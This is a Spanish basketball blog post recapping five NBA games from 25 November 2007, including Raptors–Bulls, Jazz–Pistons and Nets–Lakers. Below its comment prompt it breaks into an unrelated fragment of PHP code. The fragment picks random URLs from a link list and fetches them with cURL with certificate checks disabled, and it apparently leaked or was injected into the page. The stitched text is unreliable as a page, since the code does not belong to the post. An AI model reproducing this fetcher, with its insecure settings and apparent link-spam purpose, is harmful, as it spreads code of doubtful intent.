La crónica (25/11/07)

26 de November de 2007 por MagicJohnson32

Más de lo mismo para Bulls y Sonics, que siguen encallados en las dos victorias, aunque en el caso de los de Seattle la cosa tuvo más disculpa porque cayeron dignamente ante los Spurs. Los que entran en una dinámica preocupante son los Lakers, que perdieron en casa ante los Nets. Para dinámicas, la de LeBron James, que sumó su cuarto triple-doble de la temporada y contó con la colaboración de sus compañeros para llevarse el triunfo del Conseco Fieldhouse de Indianapolis. Aunque tal vez los números más espectaculares de la jornada fueron los de Boozer, que anotó 17 de sus 20 tiros en Auburn Hills para llevar a los Jazz al triunfo sobre los Pistons.

Vamos con la crónica de los partidos disputados el domingo:

Bulls 78 – 93 Raptors

Ni con Deng ni sin Deng. Nueva derrota de los Bulls, y van cuatro seguidas y diez en los doce partidos disputados en este desastroso arranque de temporada para los de Illinois. Anoche cayeron a manos de unos Raptors liderados por Calderón, que ha aprovechado la baja de TJ Ford para demostrar lo que puede aportar con más minutos. 19 puntos y 14 asistencias con una sola pérdida de balón en 40 minutos de juego fueron los excelentes números del base extremeño. El retorno de Deng después de su ausencia en los últimos tres encuentros no fue suficiente pese a lograr 21 puntos y 9 rebotes. Los 16-13-4 de Bosh y los 15-9 con 6 tapones de Moon complementaron el gran trabajo de Calderón.

Jazz 103 – 93 Pistons

Devastador. Así resultó el paso del ciclón Boozer por Auburn Hills. El PF de los Jazz arrasó por completo a los Pistons con una actuación de ensueño en la que destacó su acierto, 17 de 20 en tiros de campo, además de 11 rebotes, en apenas 38 minutos de juego. Claro que tener a Deron Williams al lado siempre ayuda: 21 puntos, 14 asistencias, 4 rebotes y 3 tapones del base. A la pareja se añadió Kirilenko, con un doble-doble, y las aportaciones de Okur y Brewer, ambos por encima de los 10 puntos. En los Pistons, que no alcanzaron el 40% de acierto, el mejor en ausencia de Rasheed fue McDyess, con 19-12.

pavloviclebronCavs 111 – 106 Pacers

Otro triple doble, y casi que no hace falta que digamos de quién. 30 puntos, 11 rebotes y 10 asistencias de LeBron James, en su cuarto triple-doble de la temporada, junto al acierto en los triples de sus compañeros (12 de 18 entre Pavlovic, Gibson, Jones, Brown y Newble) dieron el triunfo a los Cavs en Indianapolis. Los Pacers, en los que Jermaine volvió a ser baja, tuvieron a tres destacados: Daniels, con 25 puntos desde el banquillo; Granger, autor de 21; y Tinsley, que hizo 24 y se quedó a un rebote del triple-doble pero perdió 8 balones y acaparó demasiados ataques. En los Cavs brilló Gooden, con 23-12, pero fueron dos triples de Jones y uno de Pavlovic (21 puntos) los que sentenciaron.

Spurs 116 – 101 Sonics

26, 22 y 22; Duncan, Parker y Ginóbili, claro está. 12-2 y 2-12; Spurs y Sonics, por supuesto. Durante tres cuartos los Sonics, uno de los peores equipos de la temporada, parecieron en condiciones de dar un susto a los actuales campeones. Hasta el último periodo, en el que los Spurs impusieron su dominio y cerraron el grifo del ataque de los de Seattle, que después de anotar 64 puntos en la primera mitad, se quedaron en 37 en la segunda. Al fin vimos un gran Durant, 25-6-4 con 10 de 17 en tiros. Wally hizo 10 de 13 para 27 puntos, pero el trío de los Spurs fue, como de costumbre, demasiado para su rival.

Nets 102 – 100 Lakers

Hay ciertas cosas que resultan previsibles y hay otras que no lo son. Que, tras anotar 15 tiros libres consecutivos, Kobe falle el 16º para empatar el partido a falta de 6 segundos no es previsible. En cambio, que después de fallar sus nueve tiros intentados en el partido, Radmanovic falle también su décimo lanzamiento, el que pudo haber dado la victoria a los Lakers, es del todo previsible. Los Nets ganaron en Los Angeles a unos Lakers que suman tres derrotas seguidas pese a alcanzar ventajas de 14 puntos en la primera mitad. Un triple de Carter empató el partido al final del tercer cuarto y en apenas tres minutos al inicio del último período, con Kobe en el banquillo, los de New Jersey abrieron brecha (84-74). Kobe, que llevaba una noche nefasta en el tiro, pareció llegar a tiempo para rescatar a su equipo con 13 puntos y 2 asistencias que situaron a Lakers por delante (94-96). Pero un final de partido en el que sólo se anotaron tiros libres acabó dando el triunfo a los visitantes, en los que Jefferson volvió a ser el máximo anotador. En Lakers, a los 31-7-4-3 de Kobe se sumaron los 20-4-3 de Fisher y un nuevo doble-doble de Bynum. Aunque sobre todo destacó el 0 de 10 y -11 de eficiencia de Radmanovic en 24 minutos. Además, debutó Ariza, que jugó 7 minutos y anotó su único tiro.

netsteam

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>